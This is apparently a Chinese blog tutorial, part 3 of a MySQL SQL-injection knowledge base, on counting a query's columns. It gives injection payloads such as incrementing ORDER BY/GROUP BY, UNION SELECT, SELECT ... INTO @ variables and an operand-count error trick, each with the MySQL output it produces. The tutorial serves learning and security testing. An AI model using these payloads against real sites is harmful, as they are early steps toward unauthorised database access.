• sql注入知识库-mysql篇(3)


    上接sql注入知识库-mysql篇(2)

    表和字段

    一、检测字段数量

    order by/group  by

    group by / order by +1 ;

    备注:

    order by 和 group by 都是用来根据字段排序用的

    保持数字持续增加,直到得到一个错误响应

    尽管group by 和 order by 在sql中是不同的功能,他们都可以用完全相同的方式确认查询的列数

    examples:

    Given the query SELECT username, password, permission FROM Users WHERE id = '{INJECTION POINT}';

    1’ order by 1--+   true

    还原一下 select username,password,permission from users where id = '1' order by 1 --+ 

    从users表查询id = 1 的username , password permission 然后通过第一个字段(username)按照升序排列

    1’ order by 2--+   true

    。。。。

    1’ order by 4--+   false 说明该表总共有3列

    1' union select 1,2,3  true

    基于错误1

    group by 或 order by 1,2,3,4,5 ......

    类似上面提到的方法,我们可以通过一个请求查看显错模式是否启动来判断字段数量

    examples:

    select * from student where id = 1 order by 1,2,3 ;  true

    select * from student where id = 1 order by 1,2,3,4 ;  true

    select * from student where id = 1 order by 1,2,3,4,5 ;  返回   ERROR 1054 (42S22): Unknown column '5' in 'order clause'

    说明该表字段只有4列

    select * from student where id = 1 group by 1,2,3,4,5 ;  返回   ERROR 1054 (42S22): Unknown column '5' in 'group statement'

    说明该表字段只有4列

    基于错误2

    select  ... into var_list , var_list1 , var_list2 ....

    1. 如果显错模式开启,这个方法可以正常工作

    2. 是一个实用的用于查找字段数量的方法,当注入点后面存在一个limit子句的时候。

    examples:

    Given the query SELECT permission FROM Users WHERE id = {INJECTION POINT};

    -1 union select 1 into @,@,@  The used SELECT statements have a different number of columns

    -1 union select 1 into @   如果不报错说明查询的信息使用了一个

    mysql> select name,id1 from student limit 1,1 into @;
    ERROR 1222 (21000): The used SELECT statements have a different number of columns
    mysql> select name,id1 from student limit 1,1 into @,@;
    Query OK, 1 row affected (0.00 sec)

    字段

    实例

    mysql> select name from student where id = -1 union select 1 into @;    可以看到该查询使用了name一个字段,所以后面用select 1 into @就不会报错
    Query OK, 1 row affected (0.00 sec)

    mysql> select name,id1 from student where id = -1 union select 1,2 into @,@;  这里使用了name和id1两个字段,所以后面相应的要使用1,2 into @,@ 不会报错
    Query OK, 1 row affected (0.00 sec)

    examples:

    Given the query SELECT username, permission FROM Users limit 1,{INJECTION POINT};

    1 into @,@,@    报错 The used SELECT statements have a different number of columns

    1 into @,@        无报错说明查询的字段有2个

    实例:

    select name,id1 from student limit 1,1 into @;
    ERROR 1222 (21000): The used SELECT statements have a different number of columns
    select name,id1 from student limit 1,1 into @,@;
    Query OK, 1 row affected (0.00 sec)

     limit用法:

    limit 开始位置,取几条
    select name,id from student limit 0,1;  从student表中取出第一条数据
    select name,id from student limit 1,1;   从student表中取出第二条数据
    select name,id from student limit 0,3;  从student表中取出3条数据,从第一条开始取
     

    基于错误3

     AND (SELECT * FROM SOME_EXISTING_TABLE) = 1

    备注:

    工作在你知道表名但是没有启用错误回显的环境,它会返回字段数量

    example:

    Given the query SELECT permission FROM Users WHERE id = {INJECTION POINT};

    1 and (select * from student) = 1

    实例:
    select name,id from student where id = 1 and (select * from student) = 1;

    ERROR 1241 (21000): Operand should contain 4 column(s)


    select name,id from student where id = 1 and (select * from student) = 2;
    ERROR 1241 (21000): Operand should contain 4 column(s)

  • 相关阅读:
    Scala-高阶函数
    Scala-高阶函数
    Fragment学习笔记
    android中progress进度条的使用
    spinner下拉列表
    GridView
    利用jsp和servlet,MySQL实现简易报表
    android中TimePicker和DatePicker的简单使用
    android适配器及监听点击和滚动在ListView中的使用
    android简易计算器
  • 原文地址:https://www.cnblogs.com/luyg24/p/4322541.html
Copyright © 2020-2023  润新知